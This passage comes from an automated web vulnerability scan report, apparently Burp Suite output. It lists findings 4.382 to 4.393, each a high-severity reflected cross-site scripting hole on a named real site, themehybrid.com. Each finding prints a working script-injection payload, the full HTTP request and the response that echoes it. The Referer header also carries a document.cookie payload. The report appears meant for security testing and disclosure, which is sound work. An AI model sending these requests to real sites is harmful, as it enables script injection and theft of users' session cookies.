User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:04 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-contente1d5a\"><script>alert(1)</script>28e0a6329e5/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.382. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c913a"><script>alert(1)</script>d6100947d63 was submitted in the REST URL parameter 3. This input was echoed as c913a\"><script>alert(1)</script>d6100947d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/pluginsc913a"><script>alert(1)</script>d6100947d63/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:40 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/pluginsc913a\"><script>alert(1)</script>d6100947d63/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.383. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ec4"><script>alert(1)</script>624a982d9fe was submitted in the REST URL parameter 4. This input was echoed as e5ec4\"><script>alert(1)</script>624a982d9fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/cleaner-gallerye5ec4"><script>alert(1)</script>624a982d9fe/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:17 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/plugins/cleaner-gallerye5ec4\"><script>alert(1)</script>624a982d9fe/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.384. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1689c"><script>alert(1)</script>f7596597b83 was submitted in the REST URL parameter 5. This input was echoed as 1689c\"><script>alert(1)</script>f7596597b83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css1689c"><script>alert(1)</script>f7596597b83?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:58 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css1689c\"><script>alert(1)</script>f7596597b83?ver=0.7"/>
...[SNIP]...

4.385. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c92"><script>alert(1)</script>16b4b6cb96f was submitted in the REST URL parameter 1. This input was echoed as 44c92\"><script>alert(1)</script>16b4b6cb96f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog44c92"><script>alert(1)</script>16b4b6cb96f/wp-content/themes/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:26 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog44c92\"><script>alert(1)</script>16b4b6cb96f/wp-content/themes/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.386. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1892d"><script>alert(1)</script>bfb5b3a776f was submitted in the REST URL parameter 2. This input was echoed as 1892d\"><script>alert(1)</script>bfb5b3a776f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content1892d"><script>alert(1)</script>bfb5b3a776f/themes/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:00 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content1892d\"><script>alert(1)</script>bfb5b3a776f/themes/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.387. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cb0"><script>alert(1)</script>21f3c2085ee was submitted in the REST URL parameter 3. This input was echoed as 70cb0\"><script>alert(1)</script>21f3c2085ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes70cb0"><script>alert(1)</script>21f3c2085ee/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:41 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes70cb0\"><script>alert(1)</script>21f3c2085ee/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.388. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3d1"><script>alert(1)</script>cbb2a7067b2 was submitted in the REST URL parameter 4. This input was echoed as dc3d1\"><script>alert(1)</script>cbb2a7067b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusiondc3d1"><script>alert(1)</script>cbb2a7067b2/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:19 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusiondc3d1\"><script>alert(1)</script>cbb2a7067b2/library/js/fusion.jquery.js"/>
...[SNIP]...

4.389. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71bc"><script>alert(1)</script>e96dadf10f4 was submitted in the REST URL parameter 5. This input was echoed as a71bc\"><script>alert(1)</script>e96dadf10f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/librarya71bc"><script>alert(1)</script>e96dadf10f4/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:54:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/librarya71bc\"><script>alert(1)</script>e96dadf10f4/js/fusion.jquery.js"/>
...[SNIP]...

4.390. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 689ab"><script>alert(1)</script>a0f3a1c2da4 was submitted in the REST URL parameter 6. This input was echoed as 689ab\"><script>alert(1)</script>a0f3a1c2da4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/library/js689ab"><script>alert(1)</script>a0f3a1c2da4/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:54:34 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:54:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/library/js689ab\"><script>alert(1)</script>a0f3a1c2da4/fusion.jquery.js"/>
...[SNIP]...

4.391. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6a78"><script>alert(1)</script>18edf7c2b84 was submitted in the REST URL parameter 7. This input was echoed as e6a78\"><script>alert(1)</script>18edf7c2b84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/library/js/fusion.jquery.jse6a78"><script>alert(1)</script>18edf7c2b84 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:55:10 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:55:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/library/js/fusion.jquery.jse6a78\"><script>alert(1)</script>18edf7c2b84"/>
...[SNIP]...

4.392. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ee8"><script>alert(1)</script>ad40290be13 was submitted in the REST URL parameter 1. This input was echoed as d1ee8\"><script>alert(1)</script>ad40290be13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogd1ee8"><script>alert(1)</script>ad40290be13/wp-content/themes/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:29 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogd1ee8\"><script>alert(1)</script>ad40290be13/wp-content/themes/fusion/style.css"/>
...[SNIP]...

4.393. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9113"><script>alert(1)</script>8e9a7fe5ccf was submitted in the REST URL parameter 2. This input was echoed as a9113\"><script>alert(1)</script>8e9a7fe5ccf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contenta9113"><script>alert(1)</script>8e9a7fe5ccf/themes/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
